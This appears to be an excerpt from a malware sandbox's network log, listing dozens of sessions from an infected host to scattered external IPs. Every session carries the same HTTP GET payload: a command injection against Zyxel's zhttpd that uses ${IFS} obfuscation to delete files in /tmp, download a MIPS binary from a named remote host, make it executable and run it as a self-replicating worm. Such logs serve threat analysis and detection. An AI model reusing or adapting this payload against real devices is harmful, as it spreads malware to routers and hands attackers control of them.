                                                  Jan 19, 2024 18:23:44.823199987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1731192.168.2.1334374212.213.243.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.823251963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1732192.168.2.1333292122.43.240.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.823281050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1733192.168.2.1341520177.7.178.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.823333025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1734192.168.2.135795084.244.108.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.823371887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1735192.168.2.135393634.124.74.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.823406935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1736192.168.2.133906070.23.198.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.823445082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1737192.168.2.135109246.174.65.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.823486090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1738192.168.2.1340632195.148.44.4443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.823523045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1739192.168.2.1357766211.237.52.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.823558092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1740192.168.2.135095875.241.211.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.823596001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1741192.168.2.1360164176.177.151.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.823626995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1742192.168.2.135303642.86.123.228443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.823663950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1743192.168.2.1344572155.167.67.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.823700905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1744192.168.2.135727888.189.249.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.823745966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1745192.168.2.134416869.62.164.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.823774099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1746192.168.2.135754814.171.53.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.823813915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1747192.168.2.13513128.146.33.92443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.823853016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1748192.168.2.1333522102.188.63.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.823879004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1749192.168.2.133387890.23.228.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.823918104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1750192.168.2.135735086.154.227.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.823970079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1751192.168.2.136096476.232.33.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.823993921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1752192.168.2.1338724167.139.116.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.824032068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1753192.168.2.1346190178.185.122.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.824081898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1754192.168.2.1343898192.225.12.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.824116945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1755192.168.2.133537039.66.214.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.824146986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1756192.168.2.133608273.10.126.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.824167013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1757192.168.2.1360312136.145.10.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.824197054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1758192.168.2.133886643.137.161.181443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.824254036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1759192.168.2.1358292133.169.38.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.824254990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1760192.168.2.1333366174.170.89.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.824286938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1761192.168.2.135409448.166.141.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.824330091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1762192.168.2.1334348103.186.80.195443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.824366093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1763192.168.2.1349392210.209.254.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.824398994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1764192.168.2.1356620183.250.72.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.824424028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1765192.168.2.1345216197.36.157.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.824457884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1766192.168.2.1338070151.7.178.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.824511051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1767192.168.2.1351128138.153.227.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.824544907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1768192.168.2.13377785.102.175.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.824609041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1769192.168.2.1347956134.229.209.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.824636936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1770192.168.2.134815434.254.47.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.824670076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1771192.168.2.1357986121.132.238.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.824707031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1772192.168.2.1340202163.12.168.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.824748993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1773192.168.2.1336024156.172.142.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.824780941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1774192.168.2.134669839.134.160.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.824825048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1775192.168.2.1354592144.105.126.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.824848890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1776192.168.2.135897664.76.37.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.824902058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1777192.168.2.1339372205.176.54.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.824944973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1778192.168.2.1349628103.173.220.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.824975014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1779192.168.2.1333854150.195.32.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.825027943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1780192.168.2.1346010100.37.11.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.825072050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1781192.168.2.134287647.130.11.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.825098991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1782192.168.2.1345624152.134.87.11443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.825138092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1783192.168.2.135659219.49.203.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.825161934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1784192.168.2.1341212161.86.120.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.825208902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1785192.168.2.133487468.243.139.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.825268030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1786192.168.2.133953091.231.39.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.825297117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1787192.168.2.135925453.68.193.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.825346947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1788192.168.2.135156635.32.126.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.825361013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1789192.168.2.135594052.66.241.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.825403929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1790192.168.2.1359860172.140.115.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.825428009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1791192.168.2.135116286.72.54.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.825474977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1792192.168.2.134928058.242.63.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.825505018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1793192.168.2.13349528.59.210.106443
                                                  TimestampBytes transferredDirectionData
